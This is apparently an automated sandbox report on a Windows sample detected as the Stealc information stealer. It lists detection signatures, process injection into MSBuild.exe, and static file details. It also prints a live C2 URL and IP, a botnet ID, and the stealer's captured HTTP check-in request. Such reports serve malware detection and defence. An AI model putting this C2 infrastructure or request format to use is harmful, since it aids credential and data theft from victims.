Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1f13Cs1ogc.exe

Overview

General Information

Sample name:1f13Cs1ogc.exe
renamed because original name is a hash value
Original sample name:be961e1299e54c9a50c773db0dc3696c.exe
Analysis ID:1528301
MD5:be961e1299e54c9a50c773db0dc3696c
SHA1:203177ce2753140fc2553365e292005d383e2936
SHA256:5501120627d6aa86b043d6ca51b3bb2dffeb44a8c0cf6f153d6fdf550d76690f
Tags:32exetrojan
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Sigma detected: Silenttrinity Stager Msbuild Activity
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • 1f13Cs1ogc.exe (PID: 6352 cmdline: "C:\Users\user\Desktop\1f13Cs1ogc.exe" MD5: BE961E1299E54C9A50C773DB0DC3696C)
    • MSBuild.exe (PID: 5952 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 4524 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 4616 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • WerFault.exe (PID: 6412 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 288 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_doz"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: 1f13Cs1ogc.exe PID: 6352JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: MSBuild.exe PID: 4616JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              Click to see the 1 entries
              SourceRuleDescriptionAuthorStrings
              0.2.1f13Cs1ogc.exe.100dad8.2.unpackJoeSecurity_StealcYara detected StealcJoe Security
                3.2.MSBuild.exe.400000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  3.2.MSBuild.exe.400000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    0.2.1f13Cs1ogc.exe.100dad8.2.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                      0.2.1f13Cs1ogc.exe.fe0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                        System Summary

                        barindex
                        Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 62.204.41.150, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 4616, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-07T18:46:07.015168+020020442431Malware Command and Control Activity Detected192.168.2.54970462.204.41.15080TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: 1f13Cs1ogc.exeAvira: detected
                        Source: 3.2.MSBuild.exe.400000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_doz"}
                        Source: 1f13Cs1ogc.exeReversingLabs: Detection: 31%
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: 1f13Cs1ogc.exeJoe Sandbox ML: detected
                        Source: 1f13Cs1ogc.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49713 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49752 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49746 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49740 version: TLS 1.2
                        Source: 1f13Cs1ogc.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: 0_2_00FF9ABF FindFirstFileExW,0_2_00FF9ABF

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 62.204.41.150:80
                        Source: Malware configuration extractorURLs: http://62.204.41.150/edd20096ecef326d.php
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGIJECGDGCBKECAKFBGHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 33 39 42 45 35 35 44 37 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a Data Ascii: ------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="hwid"4239BE55D7561166170430------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="build"default6_doz------GDGIJECGDGCBKECAKFBG--
                        Source: Joe Sandbox ViewASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
                        Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                        Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                        Source: unknownHTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49713 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49752 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49746 version: TLS 1.0
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                        Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00406280 InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,3_2_00406280
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache
                        Source: unknownHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGIJECGDGCBKECAKFBGHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 33 39 42 45 35 35 44 37 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a Data Ascii: ------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="hwid"4239BE55D7561166170430------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="build"default6_doz------GDGIJECGDGCBKECAKFBG--
                        Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150
                        Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/
                        Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/bJ
                        Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2092112900.0000000000E64000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.php
                        Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.php5
                        Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/j
                        Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150t
                        Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150~
                        Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                        Source: unknownHTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49740 version: TLS 1.2
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: 0_2_00FE20210_2_00FE2021
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: 0_2_00FE729C0_2_00FE729C
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: 0_2_00FFD39B0_2_00FFD39B
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: 0_2_00FF572C0_2_00FF572C
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: 0_2_0103094F0_2_0103094F
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: 0_2_00FECAF20_2_00FECAF2
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: 0_2_00FFBB360_2_00FFBB36
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: 0_2_00FF3C920_2_00FF3C92
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: 0_2_00FE1D790_2_00FE1D79
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: 0_2_00FEFEF00_2_00FEFEF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004045C0 appears 317 times
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: String function: 00FE7B80 appears 49 times
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 288
                        Source: 1f13Cs1ogc.exe, 00000000.00000000.2073157229.000000000105C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameproquota.exej% vs 1f13Cs1ogc.exe
                        Source: 1f13Cs1ogc.exeBinary or memory string: OriginalFilenameproquota.exej% vs 1f13Cs1ogc.exe
                        Source: 1f13Cs1ogc.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 1f13Cs1ogc.exeStatic PE information: Section: .data ZLIB complexity 0.9899375
                        Source: classification engineClassification label: mal100.troj.evad.winEXE@8/5@0/1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\YWUXZ2ST.htmJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6352
                        Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\768828e0-684a-4eb3-ba57-5c773a6c2dfbJump to behavior
                        Source: 1f13Cs1ogc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: 1f13Cs1ogc.exeReversingLabs: Detection: 31%
                        Source: unknownProcess created: C:\Users\user\Desktop\1f13Cs1ogc.exe "C:\Users\user\Desktop\1f13Cs1ogc.exe"
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 288
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                        Source: 1f13Cs1ogc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                        Source: 1f13Cs1ogc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                        Source: 1f13Cs1ogc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                        Source: 1f13Cs1ogc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: 1f13Cs1ogc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                        Source: 1f13Cs1ogc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                        Source: 1f13Cs1ogc.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: 1f13Cs1ogc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: 1f13Cs1ogc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: 1f13Cs1ogc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: 1f13Cs1ogc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: 1f13Cs1ogc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: 1f13Cs1ogc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041C03D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_0041C03D
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: 0_2_00FE71AD push ecx; ret 0_2_00FE71C0
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: 0_2_01027F0D push ecx; ret 0_2_01027F20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041B035 push ecx; ret 3_2_0041B048
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
